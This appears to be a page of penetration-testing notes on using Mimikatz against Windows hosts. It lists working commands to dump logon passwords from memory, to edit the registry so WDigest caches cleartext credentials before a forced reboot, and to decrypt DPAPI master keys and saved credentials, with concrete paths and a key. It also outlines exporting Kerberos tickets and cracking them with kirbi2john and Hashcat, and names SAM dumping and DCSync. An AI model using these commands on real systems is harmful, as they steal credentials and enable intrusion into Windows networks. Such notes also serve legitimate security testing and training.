mimikatz

privilege::debug

for the saved logon password

sekurlsa::logonpasswords

  • If the password is null

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

- to check
reg query "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"

- restart the system
shutdown /r /t 0 /f

DPAPI

  • to get the master key

.\mimikatz.exe "dpapi::masterkey /in:C:\users\ppotts\appdata\roaming\microsoft\protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb /rpc" exit

  • Getting creds after getting the master key

.\mimikatz.exe "dpapi::cred /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\18A1927A997A794B65E9849883AC3F3E /masterkey:87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166" exit

Extracting Tickets from Memory with Mimikatz

  • Preparing the Base64 Blob for Cracking

  • Placing the Output into a File as .kirbi

Next, we can use this version of the kirbi2john.py tool to extract the Kerberos ticket from the TGS file.

  • Extracting the Kerberos Ticket using kirbi2john.py

This will create a file called crack_file. We then must modify the file a bit to be able to use Hashcat against the hash.

  • Modifying crack_file for Hashcat

  • Cracking the Hash with Hashcat

If we decide to skip the base64 output with Mimikatz and type mimikatz # kerberos::list /export, the .kirbi file (or files) will be written to disk. In this case, we can download the file(s) and run kirbi2john.py against them directly, skipping the base64 decoding step.

Infinite issue

  • use a non-interactive way

SAM Dump

  • Dump Hives with reg save

DCSync

PreviousLDAPNextBloodhound

Last updated